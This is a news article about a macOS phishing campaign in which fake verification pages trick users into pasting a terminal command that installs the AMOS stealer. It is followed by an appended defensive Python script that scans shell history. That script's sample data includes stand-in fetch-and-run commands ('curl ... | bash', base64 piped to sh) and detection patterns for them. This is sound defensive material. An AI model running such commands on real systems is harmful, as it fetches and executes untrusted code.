Russian hackers infect macOS through fake verification process

A new attack on macOS users has been detected by the company CloudSEK. The attackers, likely from Russia, are distributing malware called AtomicOS (AMOS), which steals passwords, crypto wallets, and system data. The attack relies on social engineering: users are tricked into manually running a dangerous command in the terminal.

According to The Hacker News, the hackers created a series of phishing websites that imitate the support pages of a popular provider. When victims open such a page, they are asked to complete a “bot check.” This check deliberately fails, and the user is then offered an “alternative” option: to paste a command, which the page has placed on the clipboard, into the terminal.

This command downloads AMOS — a known piece of malware for macOS that collects credentials, cookies, crypto wallet info, autofill data, and even screenshots from the device. Researchers found comments in Russian in the site’s source code, confirming the involvement of Russian-speaking cybercriminals.

A bit more about AMOS:

  • It is an information stealer for macOS that first appeared in 2023.
  • It is sold on the darknet as a subscription service.
  • It is actively used to target crypto traders, journalists, and tech workers.

The attack is not aimed at specific companies or countries: any macOS user can be a victim, especially those searching for tech support or services via search engines. CloudSEK notes that the phishing sites are poorly designed, with confusing instructions and interface elements meant for other operating systems, but this does not reduce the threat.

What you should do:

  • Do not run commands from suspicious sources.
  • Always verify the URLs of official websites.
  • Install antivirus and activity monitoring software for macOS.
  • Enable two-factor authentication.
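As an added, defender-side example (not from the article, The Hacker News or CloudSEK): a small scan over shell history for the kind of one-liner a fake “verification” page tells the user to paste, such as a download piped straight into a shell or an encoded payload decoded and executed. The history lines, the pattern names and the `example.invalid` host are constructed for illustration.

```python
import re

# Heuristics for commands typically pasted from a fake "bot check" page:
# a remote fetch piped into a shell, an encoded blob decoded and executed,
# or inline AppleScript. These are indicators, not a signature for AMOS itself.
SUSPICIOUS_PATTERNS = {
    "fetch-piped-to-shell": re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "base64-decoded-and-run": re.compile(r"base64\s+(-d|--decode|-D)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "osascript-inline": re.compile(r"\bosascript\s+-e\b"),
}

ZSH_EXTENDED = re.compile(r"^: (?P<ts>\d+):\d+;(?P<cmd>.*)$")

def parse_history_line(line):
    """Return (timestamp_or_None, command) for a zsh extended or plain history line."""
    m = ZSH_EXTENDED.match(line)
    if m:
        return int(m.group("ts")), m.group("cmd")
    return None, line

def scan_history(lines):
    """Return a list of (timestamp, matched_pattern_name, command) for suspicious entries."""
    hits = []
    for raw in lines:
        raw = raw.rstrip("\n")
        if not raw.strip():
            continue
        ts, cmd = parse_history_line(raw)
        for name, pat in SUSPICIOUS_PATTERNS.items():
            if pat.search(cmd):
                hits.append((ts, name, cmd))
                break  # one finding per command is enough for triage
    return hits

# Constructed sample history in zsh extended format; not real attacker data.
SAMPLE_HISTORY = [
    ": 1717000001:0;ls -la ~/Downloads",
    ": 1717000002:0;git pull --rebase",
    ": 1717000003:0;curl -fsSL https://example.invalid/verify.sh | bash",
    ": 1717000004:0;echo aGVsbG8= | base64 -d",
    ": 1717000005:0;echo Y29tbWFuZA== | base64 --decode | sh",
    "brew update",
]

if __name__ == "__main__":
    for ts, name, cmd in scan_history(SAMPLE_HISTORY):
        print(f"{ts}\t{name}\t{cmd}")
```

On a real machine, point `scan_history` at the lines of `~/.zsh_history` or `~/.bash_history`; a plain `base64 -d` with no shell after it is deliberately not flagged, so expect few false positives from ordinary use.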
